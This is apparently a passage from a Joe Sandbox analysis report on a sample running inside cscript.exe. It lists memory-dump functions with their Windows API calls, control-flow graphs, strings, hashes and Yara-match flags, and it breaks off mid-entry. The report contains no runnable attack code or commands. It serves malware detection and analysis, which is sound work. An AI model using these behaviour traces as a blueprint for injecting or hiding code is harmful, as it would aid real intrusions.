                                                                            • Opcode Fuzzy Hash: fed8a1f8b7aeaab8dbde3f3a6b0c6300c56857273205f3f1c4ee83f43ad39af7
                                                                            • Instruction Fuzzy Hash: 0521C1B1900340EBC715DF64C8A5BEBBBB9EF48B00F10811DEA2A5B345D770A950CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA66A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 289 2dba66a-2dba686 290 2dba68c-2dba6a1 RtlFreeHeap 289->290 291 2dba687 call 2dbaf60 289->291 291->290
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DA3AF8), ref: 02DBA69D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            • Opcode ID: dca94dd89a7ff1073f356e9cc4e0b44025c9e8db34db8b90f8117bea69c8e11b
                                                                            • Instruction ID: fac533be76c802c91db2216ce16724aeecbbaa234e72d5c75240e65811192d15
                                                                            • Opcode Fuzzy Hash: dca94dd89a7ff1073f356e9cc4e0b44025c9e8db34db8b90f8117bea69c8e11b
                                                                            • Instruction Fuzzy Hash: 3FE01AB6200204AFD714DF58CC88EEB37AAEF88350F118555FA1D97291C631E910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 292 2dba670-2dba6a1 call 2dbaf60 RtlFreeHeap
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DA3AF8), ref: 02DBA69D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction ID: 471cbc09f336be0d26d6ee835412e3d66aab56297a14588c572120ece64e111c
                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction Fuzzy Hash: 4CE01AB1200208ABD714DF59CC48EE777ADEF88750F118554B90957241C630E910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DA8308 Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 295 2da8308-2da831f 296 2da8328-2da835a call 2dbca00 call 2daacf0 call 2db4e50 295->296 297 2da8323 call 2dbbe60 295->297 304 2da838e-2da8392 296->304 305 2da835c-2da836e PostThreadMessageW 296->305 297->296 306 2da838d 305->306 307 2da8370-2da838b call 2daa480 PostThreadMessageW 305->307 306->304 307->306
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DA836A
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DA838B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 08e5002918a0815f30b35ee7c4d339c5fe196305e5db9d7d16ff0b47b1b6a60c
                                                                            • Instruction ID: 2e7e002858a04766d216ca5a76705530e3c43b4abd7957246a2fc691b4b2f941
                                                                            • Opcode Fuzzy Hash: 08e5002918a0815f30b35ee7c4d339c5fe196305e5db9d7d16ff0b47b1b6a60c
                                                                            • Instruction Fuzzy Hash: 8901B531A402287BE721A6949C52FEE776CAF00B51F040159FF04BA2C1E6D46D058BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DA8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DA836A
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DA838B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                            • Instruction ID: 70c8faab2acd137d4c5f2489d881ac16d729c23dc57eeb5219688199bb960174
                                                                            • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                            • Instruction Fuzzy Hash: 3E018431A802287AE721A6949C52FFE776D9F40B50F040159FF04FA2C1E6946D0586F5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DB91FD Relevance: 1.6, APIs: 1, Instructions: 115threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 520 2db91fd-2db91fe 521 2db9200-2db9216 520->521 522 2db91b6-2db91d8 call 2db4e50 520->522 523 2db9218-2db9221 521->523 524 2db9233-2db923a 521->524 532 2db91da-2db91f6 call 2dbf252 CreateThread 522->532 533 2db91f7-2db91fc 522->533 523->524 526 2db9223-2db922a 523->526 527 2db931d-2db9320 524->527 528 2db9240-2db9309 call 2dbbde0 * 2 call 2dbc0b0 call 2dbbde0 call 2dbc0b0 call 2dbbde0 * 2 524->528 526->528 530 2db922c 526->530 528->527 549 2db930b-2db9314 528->549 530->524 549->527 550 2db9316 549->550 550->527
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DAF050,?,?,00000000), ref: 02DB91EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: d7e66a0fd0e46a7025957f9718b4efbef03700ad3ac2b28073421fc65b9bd556
                                                                            • Instruction ID: 6aad7481b81ff8342687e344633dfb44e044d8e4f4eef4963de2a597ea41f84d
                                                                            • Opcode Fuzzy Hash: d7e66a0fd0e46a7025957f9718b4efbef03700ad3ac2b28073421fc65b9bd556
                                                                            • Instruction Fuzzy Hash: 8D41AEB2600745AFD729DF64CC91FE7B3A9EF40744F444519E62AAB281CB74B910CBB4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DAACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DAAD62
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction ID: 51aeec29c44d2284f85490f09c632653391e0642a27da255ec6d9871600700b9
                                                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction Fuzzy Hash: 1B011EB5D0020DABDF10DBA4DC51FDDB379AF54308F1046A5A90997240FA31EB14CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DBA734
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction ID: 79f3428859b1b5c624bd678e67021217198de6981086372e41ae981430ab5cc2
                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction Fuzzy Hash: D401AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DB91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DAF050,?,?,00000000), ref: 02DB91EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                            • Instruction ID: f17152c3fd7b0e8b6cecf878bfa3cfcc2f4cb1f5244adb21809cc7e18fb72861
                                                                            • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                            • Instruction Fuzzy Hash: C8E06D377802047AE3216599AC12FE7B29CCF81B64F150026FA0EEA6C1D995F80146A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DB91A3 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DAF050,?,?,00000000), ref: 02DB91EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: fc490646e4c839dc7f1cdacfc301d162244f29ad5bce9bd96e34a3e84aaec4dd
                                                                            • Instruction ID: 069fd43daea5d584410046c9fa02803e97a38365acead993d824fabbcb25c72d
                                                                            • Opcode Fuzzy Hash: fc490646e4c839dc7f1cdacfc301d162244f29ad5bce9bd96e34a3e84aaec4dd
                                                                            • Instruction Fuzzy Hash: 98F0EC36B403007ED33195199C57FE77358DF90B10F140029F609EB2C1CAA0F84146A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA7C2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DAF1D2,02DAF1D2,?,00000000,?,?), ref: 02DBA800
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 95cb0380192baa6882f75abe5daef2f4b9407254435c44d4b055a1ac55a7d9ae
                                                                            • Instruction ID: 9bf1f1ea567ccb19d417ce6cfbc81fc7662822d8501c22877453e6ffa953169c
                                                                            • Opcode Fuzzy Hash: 95cb0380192baa6882f75abe5daef2f4b9407254435c44d4b055a1ac55a7d9ae
                                                                            • Instruction Fuzzy Hash: 31F0E5B5200255AFC710DF48CC84FD7B769DF88640F108194FD0D5B242C630A811CBF0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(02DB4536,?,02DB4CAF,02DB4CAF,?,02DB4536,?,?,?,?,?,00000000,00000000,?), ref: 02DBA65D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction ID: 44e0e60be4955c8b037ca8ed37c3a7150188fe6342b0f1053f49a25e8393f29f
                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction Fuzzy Hash: 54E012B2200208ABDB14EF99CC44EEB77ADEF88654F118558BA095B281C630F910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DBA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DAF1D2,02DAF1D2,?,00000000,?,?), ref: 02DBA800
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction ID: b25d4bc98939cac6d8b5cc6d3a0121a4140c56efec4efc62c1cc04f5a8833f99
                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction Fuzzy Hash: BEE01AB1200208ABDB10DF49CC84EEB37ADEF88650F118154BA0957241C930E8108BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02DAF6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,02DA8D14,?), ref: 02DAF6FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                            • Instruction ID: dd317c94aa9351dd1450957dd82e702020a649795039a16515eb2d66d6563617
                                                                            • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                            • Instruction Fuzzy Hash: B7D05E656503082AE610EAA89C22F6632899B44B04F490064F949963C3D950F4008565
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ab22ffaaa5f445569cf3dbdb3cf61f1fe9945d33d753e9f9cc0fcdbee599bd8c
                                                                            • Instruction ID: a7755fddb5cd7ea94c474a5f946bf4232583223998856a24180be871d5698fe3
                                                                            • Opcode Fuzzy Hash: ab22ffaaa5f445569cf3dbdb3cf61f1fe9945d33d753e9f9cc0fcdbee599bd8c
                                                                            • Instruction Fuzzy Hash: DDB09B71D415C5D5FB11F76046087177D006BD0755F16C071F3034642E4778D1D2E576
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0070647E Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00706542,00001000,?,?), ref: 007064A8
                                                                            • HeapAlloc.KERNEL32(00000000,?,00706542,00001000,?,?), ref: 007064AF
                                                                            • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,00706542,00001000,?,?), ref: 0070E8CA
                                                                            • HeapFree.KERNEL32(00000000,?,00706542,00001000,?,?), ref: 0070E8D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 756756679-0
                                                                            • Opcode ID: c8d7d4b3f0a42667f756e7324291000282f5c94bae511a2da3492d515b34d7ad
                                                                            • Instruction ID: b4b0511906f3333d48856bd0ac90296747d529a39588a27ebebbace73fa8c027
                                                                            • Opcode Fuzzy Hash: c8d7d4b3f0a42667f756e7324291000282f5c94bae511a2da3492d515b34d7ad
                                                                            • Instruction Fuzzy Hash: 75F02231504341EBD7645FA8DC18B6676E8EB04731F20CA2DF209CB1D0EA7CC9A0C719
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00718450 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 298libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 007184A1
                                                                            • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,00000000,?,00000000), ref: 007184D4
                                                                            • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,?,00000000), ref: 00718512
                                                                            • GetUserDefaultUILanguage.KERNEL32(?,00000000), ref: 0071853C
                                                                            • GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?,?,00000000), ref: 00718607
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
                                                                            • String ID: %s\%s$MUI
                                                                            • API String ID: 1597595625-2651373239
                                                                            • Opcode ID: e5ec8735056449a7970f5f089635f0f50685ad1895da980a38ebca8e5afc97fa
                                                                            • Instruction ID: 656877266a1ee8b60cae3d93b3b6b242f463ad5035013a6d4dbb5f17d04f748d
                                                                            • Opcode Fuzzy Hash: e5ec8735056449a7970f5f089635f0f50685ad1895da980a38ebca8e5afc97fa
                                                                            • Instruction Fuzzy Hash: 98B19A71E0026D9BCF719F688C59BEA77799B84300F0485F5E909A72C1EE388EC58F56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F42890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 75fd0fcbb20c59d9dafe329ca3207525b24199f61ec4282fdb1e1a95863d93c9
                                                                            • Instruction ID: b407b419306fcc3babd4a84486dfc62b6b20f5c628ac814e79d88bdec79d1b7e
                                                                            • Opcode Fuzzy Hash: 75fd0fcbb20c59d9dafe329ca3207525b24199f61ec4282fdb1e1a95863d93c9
                                                                            • Instruction Fuzzy Hash: 6D51E7B6E00116BFDB10DF988C9097EFBB8BB48244711817AF465D7641EB34FE429BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04FB2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 8def6c92ec7ccbc3f9529996fedec0ca67a2120dd3ccc83bd523351bbae256d8
                                                                            • Instruction ID: f7c41ca2ba24508c4516dbd497ed636d8a0887b946d3d97639a671046d6bdb61
                                                                            • Opcode Fuzzy Hash: 8def6c92ec7ccbc3f9529996fedec0ca67a2120dd3ccc83bd523351bbae256d8
                                                                            • Instruction Fuzzy Hash: 43512471A00645AFDB34DF5DCC848BFB7F8EF46200B018499E5D6C7681EA74FA028BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04F37630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04F74742
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04F74655
                                                                            • Execute=1, xrefs: 04F74713
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04F74787
                                                                            • ExecuteOptions, xrefs: 04F746A0
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04F74725
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04F746FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: 1e0d7154e12685264fd0523dc9478b8961028f4fa5f8e443ca5c1e35e31c96ed
                                                                            • Instruction ID: 1a923a5de735e195f7926752d02b99fb29fe029497088b57080e01ab3e538dc0
                                                                            • Opcode Fuzzy Hash: 1e0d7154e12685264fd0523dc9478b8961028f4fa5f8e443ca5c1e35e31c96ed
                                                                            • Instruction Fuzzy Hash: CD51E6B1A002197BEB14BBA5DC95FAA77E8EF44305F0440A9E505AB190EB70BA47CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0071484C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 132libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 00714930
                                                                            • GetLastError.KERNEL32 ref: 0071493C
                                                                            • GetLastError.KERNEL32 ref: 00714990
                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00000000), ref: 007149AE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$AddressFreeLibraryProc
                                                                            • String ID: ($4$WinVerifyTrust$wintrust.dll
                                                                            • API String ID: 1171437518-2532474036
                                                                            • Opcode ID: ed69ad2fcdc96c8bc07700a07d81ce56b0b962bc68eea9562263ba8841fe5a4e
                                                                            • Instruction ID: 00ae2a1427629b042a2e4c1526bcfc623aa7eb7d281146528c5f5b1a3ca74cbf
